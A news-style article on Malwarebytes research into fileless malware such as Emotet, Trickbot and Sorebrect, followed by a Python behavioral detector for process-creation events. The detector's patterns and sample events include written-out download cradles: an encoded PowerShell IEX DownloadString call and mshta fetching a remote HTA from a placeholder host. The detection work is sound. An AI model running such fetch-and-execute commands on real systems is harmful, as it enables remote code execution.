- Fileless attacks accounted for 35 percent of all malware attacks in 2018 and are 10 times more likely to succeed than file-based attacks.
- Emotet, Trickbot, Sorebrect and SamSam attacks are expected to dominate the future threat landscape.
The threat actors who create malware variants are constantly improving their methods and innovating to subvert the cyber defense capabilities of their targets. Therefore, it becomes essential for the cybersecurity community to continually monitor the activities of new malware strains and find ways to mitigate their impact.
The security researchers at Malwarebytes, who study the various malware attack methods, have published a research report titled “Under the Radar - The Future of Undetected Malware”. The use of newer infection methods by malware authors in recent times has given rise to a new class of attacks, which could very well define the future of the threat landscape, according to the researchers.
Malware authors adopting new strategies
For malware developers, evading detection while infiltrating a targeted system has always been a key goal. However, in recent times, the strategy of malware authors has undergone a major change.
“Recently, there was a noticeable shift in malware development methodology. Avoiding detection was one thing, but threat actors soon came to another realization: the longer they held the infected endpoint, the more their profit increased. As long as they survived attempts at remediation, they could turn the money taps back on,” the researchers explained.
The recent wave of malware attacks is designed to leave behind a small foothold from which the attackers can regrow the infection later. “As a result, with this dual focus, a new class of malware has risen to prominence: under-the-radar malware,” the researchers said.
This new class of attacks adopts the propagation and anti-forensic techniques used by earlier, complex nation-state attacks to avoid detection and maintain persistence. Fileless attacks have become a prime choice for cybercriminals because most existing security products are built to fend off file-based malware and have little visibility into attacks that never write a payload to disk.
Fileless malware attacks made up 35 percent of all attacks in 2018, and they are almost 10 times more likely to succeed than file-based attacks, according to a recent Ponemon Institute report.
Among the current threats, Emotet and Trickbot occupy a prominent spot.
- Emotet, which is a banking trojan/downloader/botnet, has been detected over 1.5 million times between January and September 2018, according to Malwarebytes’ telemetry.
- The US-CERT released an alert about Emotet in July 2018 after witnessing a barrage of attack campaigns throughout the year.
- Trickbot, closely related to Emotet, has also been detected over half a million times, targeting the academic sector (from primary schools to universities), within the same period.
Other major threats include the Sorebrect ransomware, a completely fileless ransomware infection, and SamSam ransomware - a non-automated ransomware which is controlled by the attackers in an entirely manual process using batch scripts.
Where are the traditional security solutions lacking?
“There are three primary shortcomings with what we refer to as traditional security measures, including antivirus, that fail to utilize behavioral detection and a multi-layered approach to detecting and remediating threats,” researchers said.
- Traditional security solutions only look for file-based malware, which is of little to no use against fileless attacks.
- Some existing security measures rely solely on human-created signatures for their detection engine, which cannot identify newer malware strains that have no signature yet.
- The third major shortcoming of traditional security solutions is the inability to monitor process memory, which modern malware uses to hijack legitimate processes, hiding its network activity behind a trusted process name or hiding its existence entirely.
Current effective defense
The researchers provide some key pointers for improving the security solutions in use, so that they can mitigate the next generation of malware.
- Instead of relying solely on signature-based detection, using behavioral detection which is dynamic and can learn from the threats it encounters is a more effective approach for future threats.
- Most malware is spread through exploit kits and through malicious spam campaigns and often through avenues that can be monitored and protected. According to the report, “When you combine behavioral detection technology with monitoring entry points, you create a very powerful ‘bouncer’ for your systems that will keep your endpoints out of the ‘potential victim’ category.”
- Modern security solutions also need a self-defense mode that prevents them from being disabled or removed from the system during an attack.
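The report's recommendation of behavioral detection over signature matching can be shown concretely. The following is an added example, not code from the Malwarebytes report: a small scorer over process-creation events (the event fields and sample events are constructed, and the point weights and threshold are arbitrary assumptions) that flags the parent/child and command-line patterns typical of fileless droppers, such as an Office process launching a hidden, encoded PowerShell download cradle, or mshta fetching a remote HTA, without relying on any file hash.

```python
# Added example (not from the Malwarebytes report): a behavioral detector
# that scores process-creation events rather than matching file signatures.
# Event fields, sample events, point weights and threshold are constructed.
import base64
import re
from dataclasses import dataclass, field

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}
# Signed Windows binaries that will fetch and run remote content ("LOLBins").
REMOTE_LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
CRADLE_RE = re.compile(r"(invoke-expression|\biex\b|downloadstring|downloadfile|"
                       r"net\.webclient|invoke-webrequest|\biwr\b|\bwebclient\b)", re.I)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://", re.I)
SUSPICIOUS_THRESHOLD = 50  # assumed cut-off


@dataclass
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    pid: int
    score: int = 0
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_THRESHOLD


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64.
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:
        return None


def score_event(ev: ProcEvent) -> Verdict:
    v = Verdict(ev.pid)
    parent, child, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line

    def hit(points: int, reason: str) -> None:
        v.score += points
        v.reasons.append(reason)

    # Rule 1: an Office document has no business launching a script interpreter.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hit(50, f"{parent} spawned {child}")

    # Rule 2: PowerShell started with the switches droppers use to stay quiet,
    # plus a look inside any encoded payload for a download cradle.
    if child in {"powershell.exe", "pwsh.exe"}:
        lowered = cmd.lower()
        if re.search(r"-w(?:indowstyle)?\s+hidden", lowered):
            hit(10, "hidden window")
        if re.search(r"-(?:nop|noprofile)\b", lowered):
            hit(5, "profile disabled")
        if re.search(r"-(?:ep|executionpolicy)\s+bypass", lowered):
            hit(10, "execution policy bypass")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hit(20, "encoded command")
        if CRADLE_RE.search(cmd if decoded is None else cmd + " " + decoded):
            hit(30, "download cradle")

    # Rule 3: a signed system binary handed a URL pulls its payload straight
    # into memory, so there is no dropped file for a scanner to find.
    if child in REMOTE_LOLBINS and URL_RE.search(cmd):
        hit(50, f"{child} given a remote URL")
    return v


def analyze(events):
    return [score_event(e) for e in events]


def _encode_ps(script: str) -> str:
    """Build a -EncodedCommand blob the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


SAMPLE_EVENTS = [  # constructed for this example
    ProcEvent(4120, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc "
              + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")),
    ProcEvent(4121, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -Command Get-Process | Sort-Object CPU"),
    ProcEvent(4122, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://example.invalid/update.hta"),
    ProcEvent(4123, r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for v in analyze(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"pid={v.pid} score={v.score:3d} {flag:10s} {'; '.join(v.reasons)}")
```

In a real deployment the events would come from process-creation telemetry such as Sysmon or an EDR agent rather than the constructed list, and the weights would be tuned against the environment's own baseline; the point of the scorer is that none of its rules depends on the hash or even the existence of a malicious file on disk, which is exactly what a fileless dropper denies a signature engine.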
To protect against the evolving threat landscape, it is very important for cyber defense solutions to understand these new strategies and adopt modern tools, so that they are ready for this new class of attacks.